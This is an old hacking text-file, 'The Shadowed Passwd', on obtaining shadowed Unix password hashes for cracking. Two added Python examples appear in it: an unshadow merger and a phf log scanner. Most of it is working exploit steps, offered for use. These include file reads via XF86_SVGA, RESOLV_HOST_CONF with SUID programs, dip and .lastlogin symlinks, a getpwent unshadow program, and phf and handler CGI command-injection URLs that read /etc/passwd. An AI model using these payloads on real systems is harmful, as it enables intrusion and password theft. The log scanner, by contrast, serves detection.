The Shadowed Passwd
by The Arctic League - http://arctik.com

In the old days hacking was easy. You got an account on a system, downloaded the passwd file, and cracked the passwords. As you may have noticed, everyone eventually figured out that unshadowed passwd files were not as secure as they thought, so someone at (find where) invented the idea of shadowed passwds.

With a non-shadowed passwd file, /etc/passwd looks like this:

root:R0rmc6lxVwi5I:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-2:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
bhilton:LkjLiWy08xIWY:501:100:Bob Hilton:/home/bhilton:/bin/bash
web:Kn0d4HJPfRSoM:502:100:Web Master:/home/web:/bin/bash
mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash

A quick note about the normal passwd file. Every line has seven colon-separated fields:

mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash
 1  :      2      : 3 : 4 :       5       :     6     :    7

1 = username
2 = encrypted password
3 = user number (UID)
4 = group id (GID)
5 = real name
6 = home directory
7 = shell

On a system with passwd shadowing it looks like this:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
man:x:13:15:man:/usr/man:
postmaster:x:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:x:-2:100:nobody:/dev/null:
ftp:x:404:1::/home/ftp:/bin/bash
guest:x:405:100:guest:/dev/null:/dev/null
bhilton:x:501:100:Bob Hilton:/home/bhilton:/bin/bash
web:x:502:100:Web Master:/home/web:/bin/bash
mary:x:503:100:Mary C. Hilton:/home/mary:/bin/bash

This type of passwd file is impossible to crack, for the simple reason that there is nothing to crack! The x in the second field only tells login and friends to look the real hash up somewhere else. The real encrypted passwords are stored in different files on different systems, but the most common place is /etc/shadow, which is readable only by root. /etc/shadow looks something like this:

root:R0rmc6lxVwi5I:10441:0:99999:7:::
bin:*:10441:0:99999:7:::
daemon:*:10441:0:99999:7:::
adm:*:10441:0:99999:7:::
lp:*:10441:0:99999:7:::
sync:*:10441:0:99999:7:::
shutdown:*:10441:0:99999:7:::
halt:*:10441:0:99999:7:::
mail:*:10441:0:99999:7:::
news:*:10441:0:99999:7:::
uucp:*:10441:0:99999:7:::
operator:*:10441:0:99999:7:::
games:*:10441:0:99999:7:::
gopher:*:10441:0:99999:7:::
ftp:*:10441:0:99999:7:::
nobody:*:10441:0:99999:7:::
mary:EauDLA/PT/HQg:10441:0:99999:7:::
bhilton:LkjLiWy08xIWY:10446:-1:-1:-1:-1:-1:134529076

The shadow fields are: username, encrypted password, day of the last password change (counted in days from 1 Jan 1970), minimum days between changes, maximum days the password stays valid, days of warning before it expires, days of inactivity allowed after expiry, the day the account expires, and a reserved field. A * in the password field is a locked account: no password hashes to it, so there is nothing to crack there either. Only the lines with a real hash (root, mary, bhilton above) are worth feeding to a cracker.

There are many ways to unshadow a shadowed passwd file. I will go over a few of them here.
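As an added example (not part of the original text), the script below parses passwd and shadow records in the formats shown above and merges them the way the classic unshadow tools do: the x placeholder is swapped for the shadow hash, everything else is kept from passwd, and the result is sorted into crackable, locked and still-shadowed accounts. The sample records are copied from the two listings above and trimmed; the web account is deliberately kept, because it appears in the passwd listing but not in the shadow listing, and a merge has to cope with that. The field layout for shadow follows shadow(5); the -1 values on the bhilton line are treated as "not set".

```python
"""Parse /etc/passwd and /etc/shadow records and merge them into the
unshadowed passwd format that crackers expect.  Added example for this
page; sample records are copied from the listings above (constructed,
trimmed to a handful of accounts)."""
from datetime import date, timedelta
from typing import Dict, List, Optional

PASSWD_FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")
SHADOW_FIELDS = ("name", "hash", "lastchg", "min", "max", "warn",
                 "inactive", "expire", "reserved")

# Constructed sample data, taken from the listings above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
nobody:x:-2:100:nobody:/dev/null:
bhilton:x:501:100:Bob Hilton:/home/bhilton:/bin/bash
web:x:502:100:Web Master:/home/web:/bin/bash
mary:x:503:100:Mary C. Hilton:/home/mary:/bin/bash
"""
SAMPLE_SHADOW = """\
root:R0rmc6lxVwi5I:10441:0:99999:7:::
bin:*:10441:0:99999:7:::
nobody:*:10441:0:99999:7:::
mary:EauDLA/PT/HQg:10441:0:99999:7:::
bhilton:LkjLiWy08xIWY:10446:-1:-1:-1:-1:-1:134529076
"""


def parse_passwd(text: str) -> Dict[str, dict]:
    """passwd has exactly 7 fields; the GECOS field may contain spaces."""
    users: Dict[str, dict] = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7:
            raise ValueError(f"passwd line {lineno}: expected 7 fields, got {len(f)}")
        rec = dict(zip(PASSWD_FIELDS, f))
        rec["uid"], rec["gid"] = int(rec["uid"]), int(rec["gid"])  # nobody is -2
        users[rec["name"]] = rec
    return users


def parse_shadow(text: str) -> Dict[str, dict]:
    """shadow has up to 9 fields; trailing fields are often empty."""
    entries: Dict[str, dict] = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        f = line.split(":")
        if len(f) < 2 or len(f) > 9:
            raise ValueError(f"shadow line {lineno}: bad field count {len(f)}")
        f = (f + [""] * 9)[:9]
        entries[f[0]] = dict(zip(SHADOW_FIELDS, f))
    return entries


def classify_hash(h: str) -> str:
    """Separate real hashes from the placeholders that cannot be cracked."""
    if h == "":
        return "empty"      # no password at all
    if h == "x":
        return "shadowed"   # hash lives in /etc/shadow (or is missing)
    if h.startswith(("*", "!")):
        return "locked"     # nothing hashes to this
    return "hash"


def unshadow(passwd: Dict[str, dict], shadow: Dict[str, dict]) -> List[str]:
    """Merge like the classic unshadow tools: put the shadow hash where
    passwd carries x; accounts without a shadow record keep the x."""
    out = []
    for name, r in passwd.items():
        pw = r["passwd"]
        if pw == "x" and name in shadow:
            pw = shadow[name]["hash"]
        out.append(":".join([name, pw, str(r["uid"]), str(r["gid"]),
                             r["gecos"], r["home"], r["shell"]]))
    return out


def crackable(lines: List[str]) -> List[str]:
    """Usernames from unshadowed output that carry a real hash."""
    return [l.split(":")[0] for l in lines if classify_hash(l.split(":")[1]) == "hash"]


def last_change(shadow_rec: dict) -> Optional[date]:
    """Field 3 is days since 1970-01-01; empty or negative means not set."""
    try:
        days = int(shadow_rec["lastchg"])
    except ValueError:
        return None
    return None if days < 0 else date(1970, 1, 1) + timedelta(days=days)


if __name__ == "__main__":
    merged = unshadow(parse_passwd(SAMPLE_PASSWD), parse_shadow(SAMPLE_SHADOW))
    print("\n".join(merged))
    print("crackable:", crackable(merged))
```

The merged root line comes out identical to the unshadowed listing at the top of the page, and the date field shows why the shadow file is also useful for reconnaissance: 10441 days after 1 Jan 1970 is 3 Aug 1998, so you can tell how stale each password is before you start cracking.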
The first way to get the /etc/shadow file on a Linux system is to run:

XF86_SVGA -config /etc/shadow

Because of a bug in some versions of the X server's config handling, it echoes /etc/shadow to your terminal. This bug is in almost all Slackware 3.3 systems and maybe anything that runs XFree86.

In most Linux versions there is a hole in libc 5.4.7 or less that lets you point RESOLV_HOST_CONF at any file on the system. If you then run a SUID program that uses the resolver, ping for example, it prints the file to you. One of these will usually be SUID: ping, traceroute, rlogin, or ssh.

1. Type bash to start a bash shell
2. Type: export RESOLV_HOST_CONF=/etc/shadow
3. Type one of the program names above with a dummy argument, like this: ping asdf

It should print the shadowed passwd file for you. Note: you can replace /etc/shadow with any file you want to read.

On some Slackware versions dip can be used to get root; it can also be used to get the shadow file:

ln -s /etc/shadow /tmp/dummy.dip
/sbin/dip -v /tmp/dummy.dip

If dip is vulnerable this will print the shadow file.

An old SCO and System V trick is the .lastlogin hack. Check that the .lastlogin file in your home directory is owned by auth or root. To exploit:

rm -f ~/.lastlogin
ln -s ~/.lastlogin /etc/passwd

Now log out and back in so the link gets created, then:

cat .lastlogin > passwd
rm -f ~/.lastlogin

Another old trick that still works once in a while is the ypcat hack. It works on some SunOS, SCO, and System V boxes that run NIS. Simply type ypcat passwd with your capture option turned on; the NIS server hands out the passwd map, hashes included, to anyone who asks.

The most widely known shadow hack is to make lots of calls to the pw_* routines (getpwent and friends) to get the file. The unshadow C program below works on some versions of Unix, mostly the same ones that ypcat works on. On a properly shadowed system the library hands a non-root caller the x placeholder in pw_passwd, so this only helps where the C library or the NIS server fills in the real hash for anyone.
-------unshadow.c cut here----------------
#include <stdio.h>
#include <sys/types.h>
#include <pwd.h>

int main(void)
{
    struct passwd *p;

    /* Walk the whole passwd database one entry at a time and print each
       record in /etc/passwd format.  Where the library hands the real
       hash to pw_passwd, the output is the unshadowed file; otherwise
       the second field just comes back as "x" or "*". */
    while ((p = getpwent()) != NULL)
        printf("%s:%s:%d:%d:%s:%s:%s\n",
               p->pw_name, p->pw_passwd, (int)p->pw_uid, (int)p->pw_gid,
               p->pw_gecos, p->pw_dir, p->pw_shell);
    endpwent();
    return 0;
}
---------End here------------------

Web & CGI exploits:

Any OS running a web server with /cgi-bin/phf executable is open to attack. The phf CGI passes your query on to the program ph; if you send it an encoded newline (%0A, or %ff on some versions) it lets you execute commands on the system. (This is a remote hack.)

http://www.target.com/cgi-bin/phf?Qalias=x%ffcat%20/etc/passwd
or
http://www.target.com/cgi-bin/phf?Qalias=x%0Acat%20/etc/passwd

Any OS (usually IRIX) running a web server with /cgi-bin/handler executable is hackable:

telnet target.machine.com 80
GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download HTTP/1.0

Remember to use a TAB character after cat.

(c)1998, The Arctic League - http://arctik.com
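The phf hole above is a newline-injection bug: the attack only works because %0A (or %ff) decodes to a byte that ph treats as a command separator. That is also what a defender looks for. As an added example (not from the original text), here is a Python scanner that runs over common-log-format access log lines, URL-decodes the query of every request to /cgi-bin/phf, and flags any that carry a raw newline, carriage return or 0xff byte after decoding. The log lines are constructed for the example; a legitimate phf lookup is included so the check can be seen to leave it alone.

```python
"""Flag phf newline-injection requests in web server access logs.
Added example for this page, not part of the original text.  The log
lines below are constructed; the request line format is the common log
format used by NCSA and Apache servers."""
import re
from typing import List, Tuple
from urllib.parse import unquote_to_bytes, urlsplit

# host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3})'
)

PHF_PATH = "/cgi-bin/phf"
# Bytes that break out of the ph query once the server has URL-decoded them.
SEPARATORS = (b"\n", b"\r", b"\xff")

# Constructed sample log: one normal phf lookup, two attacks from the text
# above, and an unrelated request that also contains an encoded newline.
SAMPLE_LOG = """\
10.1.1.5 - - [03/Aug/1998:12:01:07 -0400] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 512
192.168.7.9 - - [03/Aug/1998:12:02:11 -0400] "GET /cgi-bin/phf?Qalias=x%0Acat%20/etc/passwd HTTP/1.0" 200 1902
192.168.7.9 - - [03/Aug/1998:12:02:40 -0400] "GET /cgi-bin/phf?Qalias=x%ffcat%20/etc/passwd HTTP/1.0" 200 1902
10.1.1.6 - - [03/Aug/1998:12:03:00 -0400] "GET /index.html?msg=%0Ahello HTTP/1.0" 200 3021
"""


def is_phf_injection(target: str) -> bool:
    """True when the request targets phf and its query decodes to a
    command separator.  Decoding once mirrors what the server does, so a
    double-encoded %250A is not flagged: phf would not decode it either."""
    parts = urlsplit(target)
    if not parts.path.endswith(PHF_PATH):
        return False
    raw = unquote_to_bytes(parts.query)
    return any(sep in raw for sep in SEPARATORS)


def scan_log(text: str) -> List[Tuple[str, str]]:
    """Return (client host, request target) for every flagged request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_phf_injection(m["target"]):
            hits.append((m["host"], m["target"]))
    return hits


if __name__ == "__main__":
    for host, target in scan_log(SAMPLE_LOG):
        print(f"phf injection from {host}: {target}")
```

Matching on the decoded bytes rather than on the literal strings %0A or %ff is what makes the check hold up against case changes (%0a) and other encodings of the same byte; matching the path first keeps the encoded newline in an unrelated request from raising a false alarm.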